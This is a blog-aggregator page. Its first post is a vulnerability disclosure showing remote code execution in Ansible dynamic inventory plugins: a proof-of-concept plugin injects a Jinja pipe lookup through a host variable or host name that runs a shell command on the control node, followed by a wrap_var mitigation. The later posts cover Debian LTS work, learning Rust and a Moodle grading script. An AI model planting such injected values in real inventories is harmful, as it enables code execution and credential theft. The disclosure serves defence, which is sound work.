Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin

from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

defines the plugin name as evgeni.inventoryrce.inventory
accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "

But it seems inventories don't do this:

for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

10 March 2024

Thorsten Alteholz: My Debian Activities in February 2024

FTP master This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.

This was just a short month and the weather outside was not really motivating. I hope it will be better in March. Debian LTS This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded:

[DLA 3739-1] libjwt security update for one CVE to fix some constant-time-for-execution-issue
[libjwt] upload to unstable
[#1064550] Bullseye PU bug for libjwt
[#1064551] Bookworm PU bug for libjwt
[#1064551] Bookworm PU bug for libjwt; upload after approval
[DLA 3741-1] engrampa security update for one CVE to fix a path traversal issue with CPIO archives
[#1060186] Bookworm PU-bug for libde265 was flagged for acceptance
[#1056935] Bullseye PU-bug for libde265 was flagged for acceptance

I also started to work on qtbase-opensource-src (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE). Debian ELTS This month was the sixty-seventth ELTS month. During my allocated time I uploaded:

[ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch

The upload of bind9 was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for exim4. I also started to work on an update for qtbase-opensource-src in Stretch (and LTS and other releases as well). Debian Printing This month I uploaded new upstream versions of:

cpdb-libs

This work is generously funded by Freexian! Debian Matomo I started a new team debian-matomo-maintainers. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams. This month I uploaded:

This work is generously funded by Freexian! Debian Astro This month I uploaded a new upstream version of:

libahp-xc

Debian IoT This month I uploaded new upstream versions of:

libjwt to fix a CVE

9 March 2024

Iustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject. And I was, and still am, thoroughly surprised. It s like someone took Haskell, simplified it to some extents, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you:

don t have to care about unintended laziness which causes memory leaks (stuck memory, more like).
don t have to care about GC eating too much of your multi-threaded RTS.
can be happy that there s lots of activity and buzz around the language.
can be happy for generating very small, efficient binaries that feel right at home on Raspberry Pi, especially not the 5.
are very happy that error handling is done right (Option and Result, not like Go )

On the other hand:

there are no actual monads; the ? operator kind-of-looks-like being in do blocks, but only and only for Option and Result, sadly.
there s no Stackage, it s like having only Hackage available, and you can hope all packages work together well.
most packaging is designed to work only against upstream/online crates.io, so offline packaging is doable but not native (from what I ve seen).

However, overall, one can clearly see there s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS). So, with that, I ve just tagged photo-backlog-exporter v0.1.0. It s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don t like Go the language, plus the GC - if I have to deal with a GC, I d rather write Haskell), then finally rewrote in Rust. What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn t care about file content, it can also double (easily) as simple file count/age exporter . And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing:

region coverage: >80%
function coverage: >89% (so close here!)
line coverage: >95%

I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent to describe testing/assertion in Rust itself, rather than via a separate, new DSL, like I was using shelltest for, in Haskell. To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I ll be ready for AI to take over coding So, for now, I ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

8 March 2024

Louis-Philippe V ronneau: Acts of active procrastination: example of a silly Python script for Moodle

My brain is currently suffering from an overload caused by grading student assignments. In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work. I use Moodle for all the classes I teach and students use it to hand me out their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment them using xournalpp and my Wacom tablet. Once this is done, I have a directory structure that looks like this:

Assignment FooBar/
  Student A_21100_assignsubmission_file
    graded paper.pdf
    Student A's perfectly named assignment.pdf
    Student A's perfectly named assignment.xopp
  Student B_21094_assignsubmission_file
    graded paper.pdf
    Student B's perfectly named assignment.pdf
    Student B's perfectly named assignment.xopp
  Student C_21093_assignsubmission_file
    graded paper.pdf
    Student C's perfectly named assignment.pdf
    Student C's perfectly named assignment.xopp

Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the

graded
paper.pdf

files and compressed in a ZIP. You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this¹. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable. Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.

#!/usr/bin/python3
# Copyright (C) 2023, Louis-Philippe V ronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
This script aims to take a directory containing PDF files exported via the
Moodle mass download function, remove everything but the final files to submit
back to the students and zip it back.
usage: ./moodle-zip.py <target_dir>
"""
import os
import shutil
import sys
import tempfile
from fnmatch import fnmatch
def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory  directory  is not a valid directory")
    if os.path.exists(f"/tmp/ base_directory .zip"):
        sys.exit(f"Final ZIP file path '/tmp/ base_directory .zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory  dirname  does not contain a 'graded paper.pdf' file")
def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)
def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/ target_dir ", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/ target_dir .zip'")
def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)
if __name__ == "__main__":
    main()

If for some reason you happen to have a similar workflow as I and end up using this script, hit me up? Now, back to grading...

If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons...

Next.

Previous.